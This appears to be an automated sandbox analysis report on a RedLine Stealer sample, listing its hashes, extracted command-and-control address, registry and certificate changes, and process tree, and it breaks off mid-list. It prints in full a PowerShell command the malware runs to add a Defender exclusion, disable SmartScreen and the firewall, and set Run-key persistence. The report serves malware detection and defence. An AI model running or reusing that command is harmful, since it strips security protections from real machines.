Analysis
-
max time kernel
149s -
max time network
154s -
platform
windows7_x64 -
resource
win7-20220718-en -
resource tags
arch:x64arch:x86image:win7-20220718-enlocale:en-usos:windows7-x64system -
submitted
04-08-2022 11:35
Behavioral task
behavioral1
Sample
e4.exe
Resource
win7-20220718-en
Behavioral task
behavioral2
Sample
e4.exe
Resource
win10v2004-20220722-en
General
-
Target
e4.exe
-
Size
4.5MB
-
MD5
5c371f2d51427f39d793c6df8487346c
-
SHA1
8bbc4272d6e36abf84a0d4fac47d49b690bfacdf
-
SHA256
e42c63f0af341c2271346774a69bdbceed9cc21f041680bc00e8e0d137340b48
-
SHA512
2f0d208bb52a44a085a9aa32169ba75ae3b5de2a552b2196532e59527eb7a0deb16fd87cc7363d7ec82627fdaba4ecf227bf2dd6da6331202a976a07c723ca34
Malware Config
Extracted
redline
1488
46.21.250.111:65367
-
auth_value
e1f55d6c61f97af563fc8c06a2c97666
Signatures
-
Modifies security service 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Start = "4" powershell.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 3 IoCs
Processes:
resource yara_rule behavioral1/memory/1740-57-0x0000000000830000-0x0000000001302000-memory.dmp family_redline behavioral1/memory/1740-58-0x0000000000830000-0x0000000001302000-memory.dmp family_redline behavioral1/memory/1740-66-0x0000000000830000-0x0000000001302000-memory.dmp family_redline -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
Processes:
e4.exeTextOutputHost.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ e4.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TextOutputHost.exe -
Downloads MZ/PE file
-
Executes dropped EXE 4 IoCs
Processes:
TextOutputHost.exeUpSys.exeUpSys.exeUpSys.exepid process 1808 TextOutputHost.exe 976 UpSys.exe 1464 UpSys.exe 576 UpSys.exe -
Modifies Windows Firewall 1 TTPs 1 IoCs
-
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
e4.exeTextOutputHost.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion e4.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TextOutputHost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TextOutputHost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion e4.exe -
Drops startup file 1 IoCs
Processes:
TextOutputHost.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\exe.lnk TextOutputHost.exe -
Loads dropped DLL 4 IoCs
Processes:
e4.exeTextOutputHost.exepowershell.exepid process 1740 e4.exe 1560 1808 TextOutputHost.exe 1020 powershell.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule behavioral1/memory/1740-57-0x0000000000830000-0x0000000001302000-memory.dmp themida behavioral1/memory/1740-58-0x0000000000830000-0x0000000001302000-memory.dmp themida \Users\Admin\AppData\Local\Temp\TextOutputHost.exe themida C:\Users\Admin\AppData\Local\Temp\TextOutputHost.exe themida \Users\Admin\AppData\Local\Temp\TextOutputHost.exe themida behavioral1/memory/1740-66-0x0000000000830000-0x0000000001302000-memory.dmp themida behavioral1/memory/1808-69-0x000000013FCD0000-0x0000000140628000-memory.dmp themida behavioral1/memory/1808-68-0x000000013FCD0000-0x0000000140628000-memory.dmp themida behavioral1/memory/1808-70-0x000000013FCD0000-0x0000000140628000-memory.dmp themida behavioral1/memory/1808-72-0x000000013FCD0000-0x0000000140628000-memory.dmp themida C:\Users\Admin\AppData\Local\Temp\TextOutputHost.exe themida \ProgramData\MicrosoftNetwork\System.exe themida behavioral1/memory/1808-80-0x000000013FCD0000-0x0000000140628000-memory.dmp themida -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WinNet = "C:\\ProgramData\\MicrosoftNetwork\\System.exe" powershell.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
e4.exeTextOutputHost.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA e4.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA TextOutputHost.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
e4.exeTextOutputHost.exepid process 1740 e4.exe 1808 TextOutputHost.exe -
Drops file in Windows directory 1 IoCs
Processes:
makecab.exedescription ioc process File created C:\Windows\Logs\CBS\CbsPersist_20220804133600.cab makecab.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies data under HKEY_USERS 5 IoCs
Processes:
UpSys.exepowershell.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ UpSys.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" UpSys.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" UpSys.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 4014132307a8d801 powershell.exe -
Processes:
TextOutputHost.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 TextOutputHost.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde TextOutputHost.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6 TextOutputHost.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 0f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a953000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f0067006900650073000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e41d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca62000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd TextOutputHost.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 19000000010000001000000044ba5fd9039fc9b56fd8aadccd597ca6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca61d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e4090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f006700690065007300000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a92000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd TextOutputHost.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 040000000100000010000000a923759bba49366e31c2dbf2e766ba870f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a953000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f0067006900650073000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e41d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca619000000010000001000000044ba5fd9039fc9b56fd8aadccd597ca62000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd TextOutputHost.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
e4.exeTextOutputHost.exepowershell.exeUpSys.exeUpSys.exepowershell.exepid process 1740 e4.exe 1808 TextOutputHost.exe 1808 TextOutputHost.exe 1808 TextOutputHost.exe 1808 TextOutputHost.exe 1020 powershell.exe 1808 TextOutputHost.exe 1808 TextOutputHost.exe 976 UpSys.exe 976 UpSys.exe 1808 TextOutputHost.exe 1808 TextOutputHost.exe 1464 UpSys.exe 1464 UpSys.exe 1808 TextOutputHost.exe 1808 TextOutputHost.exe 1700 powershell.exe 1808 TextOutputHost.exe 1808 TextOutputHost.exe 1808 TextOutputHost.exe 1808 TextOutputHost.exe 1808 TextOutputHost.exe 1808 TextOutputHost.exe 1808 TextOutputHost.exe 1808 TextOutputHost.exe 1808 TextOutputHost.exe 1808 TextOutputHost.exe 1808 TextOutputHost.exe 1808 TextOutputHost.exe 1808 TextOutputHost.exe 1808 TextOutputHost.exe 1808 TextOutputHost.exe 1808 TextOutputHost.exe 1808 TextOutputHost.exe 1808 TextOutputHost.exe 1808 TextOutputHost.exe 1808 TextOutputHost.exe 1808 TextOutputHost.exe 1808 TextOutputHost.exe 1808 TextOutputHost.exe 1808 TextOutputHost.exe 1808 TextOutputHost.exe 1808 TextOutputHost.exe 1808 TextOutputHost.exe 1808 TextOutputHost.exe 1808 TextOutputHost.exe 1808 TextOutputHost.exe 1808 TextOutputHost.exe 1808 TextOutputHost.exe 1808 TextOutputHost.exe 1808 TextOutputHost.exe 1808 TextOutputHost.exe 1808 TextOutputHost.exe 1808 TextOutputHost.exe 1808 TextOutputHost.exe 1808 TextOutputHost.exe 1808 TextOutputHost.exe 1808 TextOutputHost.exe 1808 TextOutputHost.exe 1808 TextOutputHost.exe 1808 TextOutputHost.exe 1808 TextOutputHost.exe 1808 TextOutputHost.exe 1808 TextOutputHost.exe -
Suspicious use of AdjustPrivilegeToken 10 IoCs
Processes:
e4.exepowershell.exeUpSys.exeUpSys.exepowershell.exedescription pid process Token: SeDebugPrivilege 1740 e4.exe Token: SeDebugPrivilege 1020 powershell.exe Token: SeDebugPrivilege 976 UpSys.exe Token: SeAssignPrimaryTokenPrivilege 976 UpSys.exe Token: SeIncreaseQuotaPrivilege 976 UpSys.exe Token: 0 976 UpSys.exe Token: SeDebugPrivilege 1464 UpSys.exe Token: SeAssignPrimaryTokenPrivilege 1464 UpSys.exe Token: SeIncreaseQuotaPrivilege 1464 UpSys.exe Token: SeDebugPrivilege 1700 powershell.exe -
Suspicious use of WriteProcessMemory 16 IoCs
Processes:
e4.exeTextOutputHost.exepowershell.exeUpSys.exedescription pid process target process PID 1740 wrote to memory of 1808 1740 e4.exe TextOutputHost.exe PID 1740 wrote to memory of 1808 1740 e4.exe TextOutputHost.exe PID 1740 wrote to memory of 1808 1740 e4.exe TextOutputHost.exe PID 1740 wrote to memory of 1808 1740 e4.exe TextOutputHost.exe PID 1808 wrote to memory of 1020 1808 TextOutputHost.exe powershell.exe PID 1808 wrote to memory of 1020 1808 TextOutputHost.exe powershell.exe PID 1808 wrote to memory of 1020 1808 TextOutputHost.exe powershell.exe PID 1020 wrote to memory of 976 1020 powershell.exe UpSys.exe PID 1020 wrote to memory of 976 1020 powershell.exe UpSys.exe PID 1020 wrote to memory of 976 1020 powershell.exe UpSys.exe PID 1020 wrote to memory of 472 1020 powershell.exe netsh.exe PID 1020 wrote to memory of 472 1020 powershell.exe netsh.exe PID 1020 wrote to memory of 472 1020 powershell.exe netsh.exe PID 576 wrote to memory of 1700 576 UpSys.exe powershell.exe PID 576 wrote to memory of 1700 576 UpSys.exe powershell.exe PID 576 wrote to memory of 1700 576 UpSys.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\e4.exe"C:\Users\Admin\AppData\Local\Temp\e4.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Loads dropped DLL
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\TextOutputHost.exe"C:\Users\Admin\AppData\Local\Temp\TextOutputHost.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Checks BIOS information in registry
- Drops startup file
- Loads dropped DLL
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty –Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System –Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty –Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run –Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\ProgramData -Name check.txt -ItemType file -Value 1); $(exit)3⤵
- Modifies security service
- Loads dropped DLL
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\ProgramData\UpSys.exe"C:\ProgramData\UpSys.exe" /SW:0 powershell.exe4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\UpSys.exe"C:\ProgramData\UpSys.exe" /SW:0 powershell.exe5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\UpSys.exe"C:\ProgramData\UpSys.exe" /TI/ /SW:0 powershell.exe6⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"7⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off4⤵
- Modifies Windows Firewall
-
C:\Windows\system32\makecab.exe"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20220804133600.log C:\Windows\Logs\CBS\CbsPersist_20220804133600.cab1⤵
- Drops file in Windows directory
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\UpSys.exeFilesize
923KB
MD5efe5769e37ba37cf4607cb9918639932
SHA1f24ca204af2237a714e8b41d54043da7bbe5393b
SHA2565f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2
SHA51233794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1
-
C:\ProgramData\UpSys.exeFilesize
923KB
MD5efe5769e37ba37cf4607cb9918639932
SHA1f24ca204af2237a714e8b41d54043da7bbe5393b
SHA2565f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2
SHA51233794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1
-
C:\ProgramData\UpSys.exeFilesize
923KB
MD5efe5769e37ba37cf4607cb9918639932
SHA1f24ca204af2237a714e8b41d54043da7bbe5393b
SHA2565f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2
SHA51233794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1
-
C:\ProgramData\UpSys.exeFilesize
923KB
MD5efe5769e37ba37cf4607cb9918639932
SHA1f24ca204af2237a714e8b41d54043da7bbe5393b
SHA2565f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2
SHA51233794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1
-
C:\Users\Admin\AppData\Local\Temp\TextOutputHost.exeFilesize
3.4MB
MD555a6d22be09d762103ae315f97b58561
SHA1f218c5bb6b7e3cbe9483f8bc4552edb180fd2bd1
SHA25641d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a
SHA5124b8967e85ebca846bda3910dac537b360fd36163eb778b6f3c522273d9ac0ae2821536c50a40eb3b56938396166ab83d75e7999dc32fe8807d734a479bdce820
-
C:\Users\Admin\AppData\Local\Temp\TextOutputHost.exeFilesize
3.4MB
MD555a6d22be09d762103ae315f97b58561
SHA1f218c5bb6b7e3cbe9483f8bc4552edb180fd2bd1
SHA25641d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a
SHA5124b8967e85ebca846bda3910dac537b360fd36163eb778b6f3c522273d9ac0ae2821536c50a40eb3b56938396166ab83d75e7999dc32fe8807d734a479bdce820
-
\ProgramData\MicrosoftNetwork\System.exeFilesize
3.4MB
MD555a6d22be09d762103ae315f97b58561
SHA1f218c5bb6b7e3cbe9483f8bc4552edb180fd2bd1
SHA25641d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a
SHA5124b8967e85ebca846bda3910dac537b360fd36163eb778b6f3c522273d9ac0ae2821536c50a40eb3b56938396166ab83d75e7999dc32fe8807d734a479bdce820
-
\ProgramData\UpSys.exeFilesize
923KB
MD5efe5769e37ba37cf4607cb9918639932
SHA1f24ca204af2237a714e8b41d54043da7bbe5393b
SHA2565f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2
SHA51233794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1
-
\Users\Admin\AppData\Local\Temp\TextOutputHost.exeFilesize
3.4MB
MD555a6d22be09d762103ae315f97b58561
SHA1f218c5bb6b7e3cbe9483f8bc4552edb180fd2bd1
SHA25641d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a
SHA5124b8967e85ebca846bda3910dac537b360fd36163eb778b6f3c522273d9ac0ae2821536c50a40eb3b56938396166ab83d75e7999dc32fe8807d734a479bdce820
-
\Users\Admin\AppData\Local\Temp\TextOutputHost.exeFilesize
3.4MB
MD555a6d22be09d762103ae315f97b58561
SHA1f218c5bb6b7e3cbe9483f8bc4552edb180fd2bd1
SHA25641d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a
SHA5124b8967e85ebca846bda3910dac537b360fd36163eb778b6f3c522273d9ac0ae2821536c50a40eb3b56938396166ab83d75e7999dc32fe8807d734a479bdce820
-
memory/472-90-0x0000000000000000-mapping.dmp
-
memory/976-87-0x0000000000000000-mapping.dmp
-
memory/1020-75-0x0000000000000000-mapping.dmp
-
memory/1020-81-0x0000000002A44000-0x0000000002A47000-memory.dmpFilesize
12KB
-
memory/1020-78-0x000007FEF2C50000-0x000007FEF37AD000-memory.dmpFilesize
11.4MB
-
memory/1020-93-0x0000000002A4B000-0x0000000002A6A000-memory.dmpFilesize
124KB
-
memory/1020-92-0x0000000002A44000-0x0000000002A47000-memory.dmpFilesize
12KB
-
memory/1020-77-0x000007FEF37B0000-0x000007FEF41D3000-memory.dmpFilesize
10.1MB
-
memory/1020-84-0x000000001B760000-0x000000001BA5F000-memory.dmpFilesize
3.0MB
-
memory/1700-102-0x0000000001DF0000-0x0000000001E70000-memory.dmpFilesize
512KB
-
memory/1700-104-0x0000000001DF0000-0x0000000001E70000-memory.dmpFilesize
512KB
-
memory/1700-103-0x0000000001DF0000-0x0000000001E70000-memory.dmpFilesize
512KB
-
memory/1700-98-0x0000000000000000-mapping.dmp
-
memory/1700-101-0x000007FEF1EF0000-0x000007FEF2A4D000-memory.dmpFilesize
11.4MB
-
memory/1700-105-0x0000000001DF0000-0x0000000001E70000-memory.dmpFilesize
512KB
-
memory/1700-100-0x000007FEF3500000-0x000007FEF3F23000-memory.dmpFilesize
10.1MB
-
memory/1740-67-0x0000000076F90000-0x0000000077110000-memory.dmpFilesize
1.5MB
-
memory/1740-54-0x00000000750B1000-0x00000000750B3000-memory.dmpFilesize
8KB
-
memory/1740-57-0x0000000000830000-0x0000000001302000-memory.dmpFilesize
